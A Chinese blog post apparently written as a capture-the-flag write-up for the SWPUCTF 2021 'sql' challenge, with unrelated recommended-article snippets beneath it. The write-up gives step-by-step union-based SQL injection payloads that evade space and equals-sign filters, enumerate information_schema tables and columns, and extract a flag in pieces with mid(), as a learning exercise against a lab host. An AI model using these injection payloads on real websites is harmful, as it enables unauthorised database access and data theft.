【无标题】

最新推荐文章于 2024-10-09 12:58:26 发布
最新推荐文章于 2024-10-09 12:58:26 发布
阅读量69 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64222098/article/details/128806397
版权

[SWPUCTF 2021 新生赛]sql的题解

首先进入环境,发现没有什么明显的注入地方,然后查看源码发现了注入的地方。
在这里插入图片描述
发现注入的地方后,就先试一下注入类型.

http://1.14.71.254:28419/?wllm=1

回显如图所示
在这里插入图片描述

http://1.14.71.254:28419/?wllm=1'

在这里插入图片描述
发现有报错显示。这时候可以尝试一下报错注入。先看看有多少个字段。在此过程中发现它过滤了空格,可以用/**/绕过。

http://1.14.71.254:28419/?wllm=1'/**/order/**/by/**/3#

发现还是在报错,逐步排查发现是注释符的问题,换成%23后就可以了。测试出有3个字段。 但是发现updatexml和extractvalue都被过滤掉了,然后就尝试联合注入,构造的payload如下:

http://1.14.71.254:28414/?wllm=1'/**/union/**/select/**/1,2,3%23

但是发现它回显任何一个数字,有点懵了。通过看别人的wp,发现是-1,改成-1后就可以了。至于为什么,文章后面会放出解释。

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,2,3%23

在这里插入图片描述
可以看到2,3显示出来了。
查询库:

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,database(),3%23

得到库名test_db.
查询表:
发现等号被过滤了,就用like代替,payload如下:

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23

在这里插入图片描述
猜测LTLT_flag里面有flag,查询这个表的字段:

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23

得到了id和flag,查询flag:

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,group_concat(flag),3/**/from/**/LTLT_flag%23

但是发现只显示出来了一部分flag。

在这里插入图片描述

尝试了right发现被禁了,而mid()函数是可以用的,

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,mid(group_concat(flag),1,20),3/**/from/**/LTLT_flag%23

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,mid(group_concat(flag),21,20),3/**/from/**/LTLT_flag%23

http://1.14.71.254:28414/?wllm=-1'/**/union/**/select/**/1,mid(group_concat(flag),41,20),3/**/from/**/LTLT_flag%23

成功获取flag!

为什么是-1的解释

在解释为什么-1可以,而1不可以之前,先看看联合查询,如下图所示:
在这里插入图片描述

但是在网站上一般不会显示来自grade_two的id的查询结果,只会返回查询到的第一条数据。这种情况下,我们要怎么获得我们期望的数据呢?可以让联合查询左边的查询语句返回结果为空。就例如本题,将wllm赋值为-1,因为一般情况下是不会有负值的,从而导致查询结果为空。

dockerere
关注
C# winform中无标题栏窗口如何实现鼠标拖动?
汽车电子软件领域知识分享
08-23 1346
在C# winform中,可以通过重写窗体的鼠标事件来实现无标题栏窗体的拖动。
Qt-无标题窗口
学而思
05-21 7664
        今天学习了下无标题窗口,于是来记录下我的学习过程首先建立一个Qt Widgets Application继承QWidget类创建完后直接运行就得到了如下效果那么,既然是无标题窗口就要去掉窗口栏啊,于是加上setWindowFlags(Qt::FramelessWindowHint | Qt::WindowMinimizeButtonHint);去掉标题栏,但是这样整个窗口就不能移动...
谷歌浏览器打开无标题
mp2020xuexi的博客
01-16 1016
谷歌浏览器
C#中实现无标题栏窗体拖动的代码
热门推荐
百锦再的博客
01-18 1万+
事件来实现拖动功能。当鼠标按下时,我们标记鼠标正在拖动,并保存当前坐标。在鼠标移动时,如果鼠标正在拖动,我们更新窗体的位置,使其跟随鼠标移动。当鼠标释放时,我们取消拖动标记。请注意,在窗体上添加了对应事件处理程序的窗体控件属性应该设置为对应的事件处理程序方法。在窗体设计视图,选择属性窗格,在事件选项卡中为。在C#中实现无标题栏窗体拖动的代码可以通过处理鼠标事件来实现。这样,当你在运行窗体时,你就可以通过鼠标拖动窗体来改变其位置。事件分别选择对应的处理程序方法。在这个示例代码中,我们通过处理。
C# 移动无标题栏无边框窗体的3种方法
SabreWulf
03-13 2282
目录 第一种:手工移动 第二种:调用系统API 1.引入下面代码 前提需要引入命名空间using System.Runtime.InteropServices 2.增加鼠标按下事件发送消息,让系统误以为按下是标题栏 第三种,重写 WndProc 第一种:手工移动 直接通过修改窗体位置从而达到移动窗体的效果 //定义一个位置信息Point用于存储鼠标位置 private Point mPoint; /// <summary>
Qt实现改变无标题栏窗体大小及移动窗体
danshiming的博客
11-10 3601
Qt实现鼠标左键拖动无标题栏窗体右下角改变窗体大小及移动窗体
Chrome显示无标题错误代码STATUS_INVALID_IMAGE_HASH
precy_wm的博客
01-03 1760
Chrome显示无标题错误代码STATUS_INVALID_IMAGE_HASH
WIN32无标题栏窗口移动方法种种
ZDT_zdh的博客
11-02 2219
WIN32无标题栏窗口移动方法种种 转载来源:http://blog.csdn.net/fuyun_cloud/article/details/8008197     首先,看看在正常情况下系统是怎样来移动程序窗口的。当使用者在程序窗口标题栏区域(非工作区)内,按下鼠标左键时将会发生下列事情:  ◆ 系统向该窗口过程函数发送WM_NCLBUTTONDOWN消息。  ◆ WM_NC...
Chrome 无标题 哭脸 已崩溃
wkj52719的博客
05-24 4764
谷歌浏览器chrome突然打开后任何页面均显示为无标题,哭脸。鼠标选中sheet页面时,提示已崩溃。 无法打开设置、开发工具箱 经过检查,是chrome的Userdata数据出错,导致页面加载无法正常展示页面。 修复办法: 打开文件夹C:\Users\{privateUserId}\AppData\Local\Google\Chrome,删除User data文件夹,如果需要备份UserData,请备份User Data到其他地方。 ...
c#实现无标题栏窗口的拖动
09-05
本篇文章将详细讲解如何在C#中实现这种无标题栏窗口的拖动以及其他基本操作。 首先,为了实现无标题栏窗口的拖动,我们需要处理窗体的鼠标事件。窗体的`FormBorderStyle`属性应设置为`None`,这会去除窗体的边框和...
Qt无标题窗口
05-21
在本文中,我们将深入探讨如何使用Qt框架创建一个无标题窗口,这在界面设计和自定义标题栏美化中非常有用。我们将关注`framelesswidget.cpp`、`main.cpp`、`framelesswidget.h`等核心文件,理解它们在实现无标题窗口...
C#创建无标题栏窗体
03-16
摘要:C#源码,菜单窗体,无标题栏窗体 C#创建无标题栏窗体源码,实际上是动态显示或隐藏窗体的标题栏,当隐藏的时候就类似窗体没有了标题栏,当显示标题栏的时候,鼠标按住标题栏即可拖动窗体,以前记得网友需要此...
Delphi实现拖动按钮移动无标题栏窗口
05-11
摘要:Delphi源码,界面编程,窗体拖动,无标题无标题栏的窗体的拖动功能实现,Delphi添加一个可拖动窗体的按钮,通过对此按钮的控制可移动窗体,实现按住标题栏移动窗口的功能,无标题栏也就不能显示最大化、最小化...
VC去掉'无标题'字样的方法.zip
11-21
在使用Visual C++进行编程时,我们经常会在创建新的窗口或者对话框时默认看到标题栏显示为“无标题”。这可能会对用户界面的美观性和专业性造成一定的影响。本资料包提供了一种方法来帮助开发者去掉这个“无标题”...
鲁班到家上门安装维修系统源码开发之结构功能解析
weixin_43744973的博客
10-08 915
鲁班到家上门安装维修系统的源码开发是一个复杂但富有成效的过程。通过详细的需求分析、技术选型、功能模块设计以及前后端分离开发,该系统不仅提升了服务效率,还通过数字化管理优化了用户体验。未来,该系统有望在智能家居售后服务领域发挥更加重要的作用,引领行业向更加高效、专业、透明的方向发展。
ATAM需求说明-系统架构师(七十六)
ke1ying的博客
10-08 859
1体系结构权衡分析法ATAM(Architecture Trade Off Analyzer Method)是一种常见的结构权衡分析法,该框架主要关注系统的(),针对性能、安全性、可用性和可修改性,在系统开发前进行分析、评价和这种。A共享数据库的集成方式通常将应用程序的数据存储在一个共享数据库中,通过制定统一的数据库模式来处理不同应用集成需求。场景和需求的收集,架构视图和场景的实现,属性模型的构造和分析,架构评价和折中。7企业信息资源集成管理的前提是对企业()的集成,其核心是对企业()的集成。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 351
Wintergrasp 冬拥湖 120 VS 120
应对Redis大Key挑战:从原理到实现
最新发布
欢迎来到【技术拾光者】,在这里,我们专注分享编程教程、技术趋势、实战案例和优质资源。不定期举办技术问答、专家访谈和职业指导。加入我们,共同探索技术世界,提升技能,拓展职业道路!
10-09 936
在使用Redis时,大Key问题会导致性能下降、内存消耗过多等问题。本文详细探讨了大Key问题的成因、影响及解决方案。大Key问题通常由大字符串、大集合或大对象引起,影响系统的内存使用和响应时间。通过拆分大Key、分页读取、异步删除和监控预警等方法,可以有效解决大Key问题。文章提供了Java示例代码,展示如何处理和优化Redis中的大Key问题,包括手动拆分大Key、分页读取大集合和异步删除大Key等。通过这些方法,开发者可以显著提升Redis的性能和稳定性。
设置无标题 android
05-02
在Android应用中,设置无标题是一种简洁和美观的设计方式,可以为用户提供更流畅的使用体验。以下是一些实现设置无标题的方法: 1. 在Android的Manifest文件中,找到对应Activity的标签,并添加”android:theme="@...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值